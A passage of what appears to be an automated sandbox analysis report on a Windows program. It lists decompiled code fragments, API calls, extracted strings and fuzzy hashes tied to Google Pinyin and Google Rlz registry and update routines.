                                                                                                                                                                    								goto L4;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L4:
                                                                                                                                                                    						_t51 = _v24;
                                                                                                                                                                    						if(_t51 != 0) {
                                                                                                                                                                    							RegCloseKey(_t51);
                                                                                                                                                                    						}
                                                                                                                                                                    						ReleaseMutex(_t70);
                                                                                                                                                                    						goto L7;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				L22:
                                                                                                                                                                    			}
                                                                                                                                                                    0x004c660e
                                                                                                                                                                    0x004c6612
                                                                                                                                                                    0x004c6616
                                                                                                                                                                    0x004c662e
                                                                                                                                                                    0x004c663a
                                                                                                                                                                    0x004c666f
                                                                                                                                                                    0x004c6671
                                                                                                                                                                    0x004c668e
                                                                                                                                                                    0x004c6692
                                                                                                                                                                    0x004c6693
                                                                                                                                                                    0x004c6694
                                                                                                                                                                    0x004c6699
                                                                                                                                                                    0x004c669d
                                                                                                                                                                    0x004c66a1
                                                                                                                                                                    0x004c66a4
                                                                                                                                                                    0x004c66a6
                                                                                                                                                                    0x004c66a8
                                                                                                                                                                    0x004c66ca
                                                                                                                                                                    0x004c66ce
                                                                                                                                                                    0x004c66d3
                                                                                                                                                                    0x004c66d5
                                                                                                                                                                    0x004c66d8
                                                                                                                                                                    0x004c66d8
                                                                                                                                                                    0x004c66de
                                                                                                                                                                    0x004c66e3
                                                                                                                                                                    0x004c66e9
                                                                                                                                                                    0x004c6653
                                                                                                                                                                    0x004c6653
                                                                                                                                                                    0x004c665f
                                                                                                                                                                    0x004c666e
                                                                                                                                                                    0x004c66aa
                                                                                                                                                                    0x004c66ab
                                                                                                                                                                    0x004c66b1
                                                                                                                                                                    0x004c66b1
                                                                                                                                                                    0x004c66c0
                                                                                                                                                                    0x004c66c6
                                                                                                                                                                    0x004c66c8
                                                                                                                                                                    0x004c66f3
                                                                                                                                                                    0x004c66f8
                                                                                                                                                                    0x004c66fa
                                                                                                                                                                    0x004c66fd
                                                                                                                                                                    0x004c66fd
                                                                                                                                                                    0x004c6703
                                                                                                                                                                    0x004c6708
                                                                                                                                                                    0x004c670f
                                                                                                                                                                    0x004c671b
                                                                                                                                                                    0x004c672a
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c66c8
                                                                                                                                                                    0x004c6673
                                                                                                                                                                    0x004c6673
                                                                                                                                                                    0x004c6675
                                                                                                                                                                    0x004c6678
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c6680
                                                                                                                                                                    0x004c6680
                                                                                                                                                                    0x004c6680
                                                                                                                                                                    0x004c6685
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c6687
                                                                                                                                                                    0x004c6688
                                                                                                                                                                    0x004c668c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c668c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c6680
                                                                                                                                                                    0x004c6678
                                                                                                                                                                    0x004c663c
                                                                                                                                                                    0x004c663c
                                                                                                                                                                    0x004c663c
                                                                                                                                                                    0x004c6642
                                                                                                                                                                    0x004c6645
                                                                                                                                                                    0x004c6645
                                                                                                                                                                    0x004c664c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c664c
                                                                                                                                                                    0x004c663a
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,FFFFFFFF,00000001,00000000,00000000), ref: 004C65D8
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C65F7
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004C6645
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C664C
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C6653
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0002021F), ref: 004C66AB
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,DCC,00000000,00000001,?,00000002), ref: 004C66C0
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,0002021F), ref: 004C66D8
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,0002021F), ref: 004C66E3
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C66FD
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C6708
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004C670F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Mutex$Release$Handle$CreateObjectSingleValueWaitlstrlen
                                                                                                                                                                    • String ID: DCC$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
                                                                                                                                                                    • API String ID: 4144916664-2800988495
                                                                                                                                                                    • Opcode ID: 201388cde2c4da7d3c640f7329558fdd756c5c0e5a7e0c9774716c177765ec39
                                                                                                                                                                    • Instruction ID: 3f2148d84523ded1ce25719b7405d3aae7f982d4b23dc9df9a99c25775b65ec6
                                                                                                                                                                    • Opcode Fuzzy Hash: 201388cde2c4da7d3c640f7329558fdd756c5c0e5a7e0c9774716c177765ec39
                                                                                                                                                                    • Instruction Fuzzy Hash: EE41043A504344ABC3209F21DC48E6BBBE8FFAA354F45491EF44193250DB39990ADB6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                    • API String ID: 1771113911-4289949731
                                                                                                                                                                    • Opcode ID: b2ecf377ef10707a4c976112d764b5a9351d2708477616277a28b1c4928c2491
                                                                                                                                                                    • Instruction ID: fec2733f6f63565a70354a2ee0d581cd4790efa1bddb06e8db3addcb9ce23dc0
                                                                                                                                                                    • Opcode Fuzzy Hash: b2ecf377ef10707a4c976112d764b5a9351d2708477616277a28b1c4928c2491
                                                                                                                                                                    • Instruction Fuzzy Hash: 3DB18230314240CBDA18DF59DDD592FB7A6EB817047244E3EE482EB7C2D638EC85879A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowLongW.USER32(09D48295,000000F0), ref: 004471E2
                                                                                                                                                                    • GetParent.USER32 ref: 004471F5
                                                                                                                                                                    • GetWindow.USER32(?,00000004), ref: 00447202
                                                                                                                                                                    • GetWindowRect.USER32 ref: 00447212
                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00447227
                                                                                                                                                                    • MonitorFromWindow.USER32(?,00000002), ref: 00447242
                                                                                                                                                                    • GetMonitorInfoW.USER32 ref: 00447273
                                                                                                                                                                    • GetWindowRect.USER32 ref: 004472B9
                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,?,?,00000004), ref: 00447377
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$LongMonitorRect$FromInfoParent
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,FFFFFFFF,00000001,00000000,00000000,?,?,?,?,?,00000000,00517520,000000FF), ref: 004C3426
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3445
                                                                                                                                                                      • Part of subcall function 004C3630: CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,09D48295,?,00000000), ref: 004C3671
                                                                                                                                                                      • Part of subcall function 004C3630: WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004C3690
                                                                                                                                                                      • Part of subcall function 004C3630: RegCloseKey.ADVAPI32(80000001), ref: 004C36CD
                                                                                                                                                                      • Part of subcall function 004C3630: ReleaseMutex.KERNEL32(00000000), ref: 004C36D4
                                                                                                                                                                      • Part of subcall function 004C3630: CloseHandle.KERNEL32(00000000), ref: 004C36DB
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 004C34A3
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C34AA
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C34B1
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3543
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3555
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3558
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C355F
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,0053B900,?,?,?,?,?,?,?,?,?,?,00000000,00517520,000000FF,004C5A75), ref: 004C3585
                                                                                                                                                                      • Part of subcall function 0040EDA0: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,0040E2BD,00000000,?), ref: 0040EDC7
                                                                                                                                                                      • Part of subcall function 00401590: RegCloseKey.ADVAPI32(00000000,00403512,?,?,?,?,?,?,?,?,?,?,?,00510206,000000FF), ref: 00401597
                                                                                                                                                                      • Part of subcall function 004C7B10: RegCloseKey.ADVAPI32(?,004C4AED,00000000,00512DA0,000000FF,004C280F,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C7B1E
                                                                                                                                                                      • Part of subcall function 004C5DF0: ReleaseMutex.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5DF9
                                                                                                                                                                      • Part of subcall function 004C5DF0: CloseHandle.KERNEL32(?,004C4D22,?,00000008,?,?), ref: 004C5E03
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Mutex$HandleRelease$CreateObjectSingleValueWait$DeleteQuery
                                                                                                                                                                    • String ID: %s\%s$RLSs$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00406491
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000001), ref: 004064A5
                                                                                                                                                                    • _wcsrchr.LIBCMT ref: 004064B2
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00406524
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000), ref: 00406562
                                                                                                                                                                    • _memset.LIBCMT ref: 00406571
                                                                                                                                                                    • CreateProcessW.KERNEL32 ref: 004065A0
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004065B0
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004065C1
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004065C8
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharCloseHandleMultiWide_memset$CreateFileModuleNameObjectProcessSingleWait_wcsrchr
                                                                                                                                                                    • String ID: D$DebugMessage.exe$Fatal error
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004D47D0: CreateMutexW.KERNEL32(00000000,00000000,DATA_UPDATE_MUTEX), ref: 004D4834
                                                                                                                                                                      • Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,09D48295), ref: 00453D9B
                                                                                                                                                                      • Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00453DA6
                                                                                                                                                                      • Part of subcall function 00456D70: RegCreateKeyExW.ADVAPI32 ref: 00456DB9
                                                                                                                                                                      • Part of subcall function 00456D70: lstrlenW.KERNEL32(00000000), ref: 00456DC8
                                                                                                                                                                      • Part of subcall function 00456D70: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DE3
                                                                                                                                                                      • Part of subcall function 00456D70: RegCloseKey.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DEE
                                                                                                                                                                      • Part of subcall function 004570E0: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00457136
                                                                                                                                                                      • Part of subcall function 00456F40: RegCreateKeyExW.ADVAPI32(00000000,?), ref: 00457008
                                                                                                                                                                      • Part of subcall function 00456F40: lstrlenW.KERNEL32(?), ref: 0045701A
                                                                                                                                                                      • Part of subcall function 00456F40: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00457035
                                                                                                                                                                      • Part of subcall function 00456F40: RegCloseKey.ADVAPI32(?), ref: 00457055
                                                                                                                                                                    • lstrlenW.KERNEL32(os=win_x64), ref: 0043D9FD
                                                                                                                                                                    • lstrlenW.KERNEL32(os=win_x86), ref: 0043DA52
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000005), ref: 0043DBA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Createlstrlen$CloseEventValue$ExecuteMutexShell
                                                                                                                                                                    • String ID: --base_url=%s --major=%d --minor=%d$GooglePinyinDictionary.exe$Software\Google\Google Pinyin 2\Autoupdate Sysdict$https://tools.google.com/service/update$os=win_x64$os=win_x86$p1S$pinyinsysdict$sysdict
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,?,00000000,?,?,?), ref: 00454314
                                                                                                                                                                    • HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,0055B1A0,80000000,00000000), ref: 0045434F
                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00454368
                                                                                                                                                                    • HttpQueryInfoW.WININET ref: 0045439B
                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000002,00000000,00000002,00000080,00000000), ref: 004543CD
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 004543F6
                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000), ref: 00454402
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00454414
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,?,?,?), ref: 00454439
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Http$ObjectPointerRequestSingleWait$CreateInfoOpenQuerySend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2605227227-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                    • API String ID: 1771113911-4289949731
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?), ref: 004C47E8
                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 004C48AA
                                                                                                                                                                      • Part of subcall function 00401050: __CxxThrowException@8.LIBCMT ref: 00401062
                                                                                                                                                                      • Part of subcall function 00401050: _memcpy_s.LIBCMT ref: 00401078
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumException@8OpenThrowValue_memcpy_s
                                                                                                                                                                    • String ID: %s=$%s\%s\%s$Events$Software\Google\Common\Rlz$events
                                                                                                                                                                    • API String ID: 4032657638-87630656
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Smanip$Current$CountLockitLockit::_ProcessThreadTick_strrchrstd::_
                                                                                                                                                                    • String ID: )]
                                                                                                                                                                    • API String ID: 1414262230-4238780332
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0041771E
                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,?,?,?), ref: 00417734
                                                                                                                                                                    • _memset.LIBCMT ref: 0041775A
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,VirtualStore,?,?,?,?,?,?), ref: 0041777D
                                                                                                                                                                    • _memset.LIBCMT ref: 00417797
                                                                                                                                                                    • _memset.LIBCMT ref: 004177C2
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004177DF
                                                                                                                                                                      • Part of subcall function 00410120: _memset.LIBCMT ref: 00410185
                                                                                                                                                                      • Part of subcall function 00410120: PathCombineW.SHLWAPI(?,09D48295,00530660,0052FD50,?,00000000), ref: 0041019B
                                                                                                                                                                      • Part of subcall function 00410120: _memset.LIBCMT ref: 004101BE
                                                                                                                                                                      • Part of subcall function 00410120: FindFirstFileW.KERNEL32(?,?), ref: 004101D6
                                                                                                                                                                    • _memset.LIBCMT ref: 0041780D
                                                                                                                                                                    • _memset.LIBCMT ref: 00417848
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$Path$Combine$FileFindFirstFolderSpecial
                                                                                                                                                                    • String ID: VirtualStore
                                                                                                                                                                    • API String ID: 3133161270-2450178472
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004128B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,09D48295,00000000,?,00000000,00531340,?,?,00000000), ref: 00412904
                                                                                                                                                                      • Part of subcall function 004128B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 0041294D
                                                                                                                                                                    • _memset.LIBCMT ref: 004395B5
                                                                                                                                                                    • _memset.LIBCMT ref: 0043970C
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,?,00000000,?), ref: 00439740
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,00000000,?), ref: 00439752
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00439764
                                                                                                                                                                    • _memset.LIBCMT ref: 0043978A
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,?,?,?,?,00000000,?), ref: 004397B8
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00439830
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$File_memset$ByteCharCombineExistsMultiWide$Delete
                                                                                                                                                                    • String ID: .00000
                                                                                                                                                                    • API String ID: 515340337-10118669
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00403441,?,?,?,?,?,?,?,?,?,?,?,00510206), ref: 004015C7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 004015D7
                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 004015F9
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00403441,?,?,?,?,?,?,?,?,?,?,?,00510206), ref: 00401618
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00401628
                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401656
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                                                                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                                                                                                    • API String ID: 588496660-1053001802
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memmove.LIBCMT ref: 004BF54B
                                                                                                                                                                      • Part of subcall function 00409B50: std::_Xinvalid_argument.LIBCPMT ref: 00409B66
                                                                                                                                                                      • Part of subcall function 00409B50: std::_Xinvalid_argument.LIBCPMT ref: 00409B81
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid strings::Substitute() format string: ", xrefs: 004BF465
                                                                                                                                                                    • laS, xrefs: 004BF48B
                                                                                                                                                                    • laS, xrefs: 004BF33A
                                                                                                                                                                    • args were given. Full format string was: ", xrefs: 004BF31C
                                                                                                                                                                    • a, xrefs: 004BF44E
                                                                                                                                                                    • ", but only , xrefs: 004BF2BF
                                                                                                                                                                    • strings::Substitute format string invalid: asked for "$, xrefs: 004BF268
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                    • String ID: args were given. Full format string was: "$", but only $Invalid strings::Substitute() format string: "$a$laS$laS$strings::Substitute format string invalid: asked for "$
                                                                                                                                                                    • API String ID: 2168136238-2065123448
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,09D48295,00000007,?,?,00000000,0040493A,?,00015180,0003F480,00002A30,00000000,00000000,0000002C), ref: 00411453
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000000,0040493A,?,00015180,0003F480,00002A30,00000000,00000000,0000002C,?,00000000), ref: 0041145A
                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000400,?,00000000,0040493A,?,00015180,0003F480,00002A30,00000000,00000000,0000002C,?,00000000), ref: 0041149B
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 004114A3
                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 004114DE
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 004114E7
                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32 ref: 0041151D
                                                                                                                                                                    • EqualSid.ADVAPI32(?), ref: 0041154E
                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0041156C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualErrorFreeHandleInitializeLastOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 993157163-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0040C684
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040C6EF
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 0040C6F6
                                                                                                                                                                    • StackWalk64.DBGHELP(0000014C,00000000,?,00000000), ref: 0040C702
                                                                                                                                                                    • VirtualQuery.KERNEL32(0040C630,?,0000001C,?,00000000), ref: 0040C720
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 0040C736
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040C759
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 0040C760
                                                                                                                                                                    • StackWalk64.DBGHELP(0000014C,00000000,?,00000000), ref: 0040C76C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Current$ProcessQueryStackThreadVirtualWalk64$_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3754933484-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040F940: RegOpenKeyExW.ADVAPI32(80000002), ref: 0040F9CA
                                                                                                                                                                      • Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218
                                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32(00000002,?,?,?,00000005,?,?,?,00000005), ref: 0044295C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DefaultLangOpenSystem_memmove
                                                                                                                                                                    • String ID: %04x$brand$h3S$osver$rlz$version
                                                                                                                                                                    • API String ID: 1615369108-593104895
                                                                                                                                                                    • Opcode ID: 68de627df94efe73fea92e91824433bc7caba42a0a92d64470145a61cef22419
                                                                                                                                                                    • Instruction ID: 75927a628608c53961155f1d1fee205a03850352040fae8e4e29f3cd57f1b155
                                                                                                                                                                    • Opcode Fuzzy Hash: 68de627df94efe73fea92e91824433bc7caba42a0a92d64470145a61cef22419
                                                                                                                                                                    • Instruction Fuzzy Hash: CAB1B2715087809FD300DB2AC84161BBBE5BFC9318F484E2EF499973A1DB79E944CB56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _sprintf.LIBCMT ref: 004A244E
                                                                                                                                                                      • Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
